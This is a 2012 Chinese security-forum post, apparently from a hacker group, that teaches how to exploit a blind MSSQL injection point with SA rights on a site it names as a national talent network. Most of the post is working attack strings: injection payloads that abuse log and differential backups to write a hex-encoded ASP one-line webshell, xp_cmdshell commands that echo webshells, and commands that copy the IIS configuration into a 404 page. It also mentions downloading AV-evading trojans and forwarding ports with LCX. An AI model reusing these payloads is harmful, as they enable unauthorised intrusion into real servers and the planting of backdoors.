找回密码
 立即注册
欢迎中测联盟老会员回家,1997年注册的域名
查看: 2263|回复: 0
打印 上一主题 下一主题

sa权限的教程.

[复制链接]
跳转到指定楼层
楼主
发表于 2012-9-15 14:30:15 | 只看该作者 回帖奖励 |倒序浏览 |阅读模式
————————————————————————九零后安全技术小组 | 90 Security  Team -- 打造90后网安精英团队  ———————————————————————————————
8 R9 l: Z: J6 d) Z7 z6 n' l1 S  o& ?! z

/ X4 d+ u  W$ p4 E2 z                                                             欢迎高手访问指导,欢迎新手朋友交流学习。
( ~" v& e% n0 q' ]; N* S
: F) m7 D6 N+ a7 E& W- U" k3 r                                                                 : P6 Q8 _" v: n
                                                                 6 \; ]* @6 Z" _" {
                                                                  论坛: http://www.90team.net// l" Q+ a9 m6 \, p1 r. h
; D9 P9 @3 l  Y+ U8 u/ {
- Q1 l' p$ C7 |4 m
- H6 y1 P9 {% ^/ `* D' a0 U# d
友情检测国家人才网
$ A7 l, M5 `- T4 n7 Z2 i  ^" W" h, R+ V. H  m

1 G9 l" [/ b% e% o; m内容:MSSQL注入SA权限不显错模式下的入侵4 }6 k5 ?0 b1 o; V

+ Y7 B! z3 L, X0 {* k" s+ ]8 k' k- W- Z: g0 {8 l- m/ M' }* [' @5 j
一般新手扫到不显错的SA(systemadmin)的注入点时,虽然工具能猜表列目录但还是很麻烦有的人就直接放弃了,今天我给大家演示下如何利用。方法很简单大家看操作。) d# Y, d5 u6 v) J, x  n
; I' `/ l; ~$ M5 y
我这里使用的是 火狐的插件提交参数。跟在浏览器里直接提交一样。& X/ Q, ~" U5 w$ I
+ f, y+ k, h) X: [1 k* t. [
" Y; l& S8 }* v# }$ x, l
这里的主机环境:MSSQL+JSP 权限为不显错的SA,支持多行执行 xp_cmdshell存活 服务器处于内网,WEB和数据库在同一台服务器上。注意这里服务器操作系统是windows2003,IIS,404页面的默认路径是 C:\Windows\Help\iisHelp\common\404b.htm。
4 e. f* s% ?7 G8 c/ @8 s) ~) v; E' s# \) a9 d: ]/ ^
思路:2 O, c) ]8 T! }. v

: x3 K5 n* g- S6 R% h+ H+ j首先:
( s. x6 B% Z: e. t. a0 d- z& s0 C/ z7 e; Z7 t) J* k
通过XP_CMDSHELL 执行命令再将执行结果指向IIS的404页面,然后访问WEB站点的一个不存在的目录得到命令执行结果,刺探服务器信息。
4 U+ u5 I  B( u3 Q8 C  q/ @* T: K+ S4 }9 B6 p6 X
1.日志备份获得Webshell
. ~! a$ [0 S0 [3 E
# V) O: V: g3 y  t2.数据库差异备份获得Webshell1 j7 f) U0 D/ n5 b7 Y, j8 ~6 C' ]
8 m7 {5 E! _2 U( _, u" u5 ?
4.直接下载免杀远控木马。, r; s- X  P1 H5 D% n8 r
: b4 J- e$ I& e# [6 s2 _/ r, p
5.直接下载LCX将服务器端口转发出来
. `4 @  T& a/ a$ h; o# n' I2 K6 r( X! `8 d9 S, O% Z
6.通过XP_CMDSHELL 执行命令读取iis配置文件(C:\Windows\system32\inetsrv\MetaBase.xml )分析查找WEB站点路径并在CMD下写入转义后的一句话获得WEBSHELL上传LCX将服务器转发出来。
* p( G/ B( S" X+ s+ k+ e6 }
8 H6 K/ L6 F$ l! \& B! L5 z( Q! W' j; l0 t# [% J( s/ h
8 f2 K, _  l5 C4 K9 H8 c& V7 @
在这里我就不浪费大家时间了,我已经测试过  日志备份和 数据库差异备份 都没有成功 我就不演示了。  直接下载免杀木马。。这个也不用演示了。 直接在注入点后写入一个 DOWN 的VBS脚本下载就行了, 5 H3 L* ?$ H% E
2 ^; ^5 Z$ A' d* x& N
我直接演示后面一个方法
" y8 j9 A4 j% K% [4 e. d. I( F1 |7 K6 ^. w8 O

7 _8 x4 Y8 l/ Q5 q2 ^# X# f分析查找WEB站点路径并在CMD下写入转义后的一句话获得WEBSHELL ) i; j& s3 q" N7 b) E; Y
/ |0 ?+ A! T5 O$ \3 G3 G

. [  @7 h1 o$ k) U7 Z
. E, T# }* ^  U3 x
' c/ v2 Y6 ^; D, Y, f◆日志备份:
" T7 o! A) P2 Z: l) M% t6 Q$ e) I
; x; j* n* ?! U0 |* h/ Q- y& G& `) j# N- I% F6 p
1. 进行初始备份& q& g+ P0 p5 A3 z+ q( C
; Alter Database TestDB Set Recovery Full Drop Table ttt Create Table ttt (a image) Backup Log TestDB to disk = '<e:\wwwroot\m.asp>' With Init--
; p; X! }  I+ A2 g7 l+ M: j1 R% A/ r9 Z1 a
2. 插入数据% n* m  `' y* K8 q# D
;Insert Into ttt Values(0x253E3C256576616C2872657175657374286368722839372929293A726573706F6E73652E656E64253E)--  z- a- Z6 E4 n- T& n# R
+ @+ o  ]2 N1 f  v6 `
0x253E3C256576616C2872657175657374286368722839372929293A726573706F6E73652E656E64253E   为 一句话木马 %><%eval(request(chr(97))):response.end%>! d+ o! [( d1 o4 c, R
  % m+ _+ l3 I' ~* }$ y
3. 备份并获得文件,删除临时表
/ j% a1 y* j3 K% u4 n: g1 C9 K;Backup Log <数据库名> To Disk = '<e:\wwwroot\m.asp>';Drop Table ttt Alter Database TestDB Set Recovery SIMPLE--+ M' D3 g& P& C4 s' u

% e% T9 k/ s0 I  q5 `
9 Q# p& ~! U# n& z& T/ f  W% o  v1 {" F
◆数据库差异备份) x% [/ F$ D# I8 f
9 c! V8 F( k1 y! }$ v' d, a
(1. 进行差异备份准备工作- y9 M  T, X' @1 Q' h2 g
/ u" G7 p* I, K3 D6 c# c/ U+ C
;Declare @a Sysname;Set @a=db_name();Declare @file VarChar(400);Set @file=<0x633A5C746573742E617370>;Drop Table ttt Create Table ttt(c Image) Backup Database @a To Disk=@file--8 B4 S" x! F. W$ ]9 K1 C7 g

; o. E3 g3 l, M  s$ e, h上面的 0x633A5C746573742E617370  是 c:\test.asp 路径转换后的16进制编码0 K* v" C  \5 Z& I, u

" F3 R# L7 O# I" [; m) f
- ?0 _1 j# r& I/ Z% i6 |+ x+ c(2. 将数据写入到数据库
5 O% d& Z, d, {  H;Insert Into ttt Values(0x253E3C256576616C2872657175657374286368722839372929293A726573706F6E73652E656E64253E)--
& S! l0 M: C' d" T1 l+ V8 J2 Z/ H2 s' z5 j
0x253E3C256576616C2872657175657374286368722839372929293A726573706F6E73652E656E64253E   为 一句话木马 %><%eval(request(chr(97))):response.end%>+ M( h% K, a( |, |

2 E4 H. G+ r1 D8 B* q3. 备份数据库并清理临时文件# H4 c: {, C( b+ J: V1 O

8 F0 u. f3 v) v- y# S4 Y# u;Declare @b SysName;Set @b=db_name();Declare @file1 VarChar(400);Set @file1=<0x633A5C746573742E617370>;Backup Database @b To Disk=@file1 With Differential,Format;Drop Table ttt;--
+ q5 C* @- s: R( R" b
' c$ B0 `, K* a0x633A5C746573742E617370  为 c:\test.asp  删除临时文件 1 X  M% L# f5 h+ m# j

( |, |/ _5 a7 G2 z- i( K
( A+ @' C4 p  B/ P, X: }8 A, y
, }' R8 g, V/ Q: Y" Q( }( j用^转义字符来写ASP(一句话木马)文件的方法:   2 X9 z, n9 R9 ]" l1 @2 [
/ E& B  c9 }" A5 J* q  Z
1.注入点后执行;exec master.dbo.xp_cmdshell 'echo ^<script language=VBScript runat=server^>execute request^("90"^)^</script^> >c:\mu.asp';--, _$ }, S& Z# C" M7 W

3 W, n/ w) Y3 Y! _% r$ L7 ?2.CMD下执行 echo ^<%execute^(request^("l"^)^)%^> >c:\mu.asp
9 S- w, T4 q! E+ }; l/ G. U1 `4 m; `* h& d/ h
读取IIS配置信息获取web路径
7 R6 }9 e+ k, b# K& w* Z/ z! U$ i  }2 H4 h4 r/ L- [  c- I  t& ~
     
6 R. D& Z1 z1 a( @     注入点后面执行   ;exec master..xp_cmdshell 'copy C:\Windows\system32\inetsrv\MetaBase.xml C:\Windows\Help\iisHelp\common\404b.htm'--' v8 I0 x7 {% g8 O6 H3 u2 g6 }

$ A, L- h! c  t, ?/ ]+ H! Y( h执行命令; X5 E& ]. R% U+ F
     / D0 h5 Y' t1 H) m" o7 U+ ^, ]
     注入点后面执行   ;exec master..xp_cmdshell 'ver >C:\Windows\Help\iisHelp\common\404b.htm'--
( k+ e9 f" Y( P' n2 S; @1 E9 V2 ~; Q5 i6 e0 P4 @7 X% b

) [' f4 r8 x" G$ |3 |7 O2 @8 P- b
& q+ y# f* j* k. U% H
* Z3 A% |5 r7 b% W- V6 v$ K8 [* v7 {8 P. \

3 ]' {# `; V2 A) l( h
' w" b1 @+ o# [0 J0 W$ ^! i* h  {
. S. u  S: q4 R, g0 X) w* F4 g2 j
' b! J: h! C" \, Y, D# y9 N, D0 Q9 A* _6 d' \

2 U3 G) I, r! X+ Q) s: p) t; F3 v- m) X; l3 O& m: o
! E* @& P+ w/ g* _4 _( }- S5 F% v& _
5 i! _, a- a3 R  i' i

9 l7 o( s( ?4 M1 B1 n
9 N8 M( Z6 U. h5 Z% c7 z
* T8 ]+ V" O& b5 Q: n5 P- M1 m8 m" {# A, F

0 E5 {4 [$ r9 C0 {  g
4 n) Z3 f, J( I) W6 e: Z/ `9 m0 o% n, g/ b7 @

9 g" H( n8 D6 Q( |2 n* ^! s( b, D! `

) S, [7 N4 R* `: `2 s" b4 f- o& r& ~1 z$ H4 Z) D* }+ w

% j4 k+ n" e6 U% j/ j8 ]8 Z) o' z5 O2 u
! ?/ r  |4 N6 c3 t8 C

. L  _: V9 v5 k* o, t& u! O
/ D' \6 T+ n2 ]! k  H' s* e/ ]9 N$ J+ J* G, ]9 S: k
: ~- O7 z/ e6 p: t' z

8 A; O  N$ m! U0 {0 x1 l- D/ V# c1 L- W! M

* |/ h8 T9 m6 O* r+ v, G( I7 K3 C+ h/ V3 t7 R8 y7 P
/ ]( ^8 d- _/ p' g1 D5 J4 U% {# @
8 s+ E3 u# z4 e( o* u4 D

2 k0 Q  z+ H+ Y- `: d% s3 r! _. ~% h# y- g; J

, \- ]% o) w7 j- K
/ M! Y3 W9 E5 g7 \: \
9 H8 y0 F2 S, O7 q
7 d4 |& Y) i2 k
! U& m8 B3 c8 ]5 t; M, |8 ?5 r# s* x9 |9 ^7 e, N

8 r' s" ]( R1 b; o( G* {7 G7 Y2 G. q! X/ l% h9 f, y$ m) m
回复

使用道具 举报

您需要登录后才可以回帖 登录 | 立即注册

本版积分规则

快速回复 返回顶部 返回列表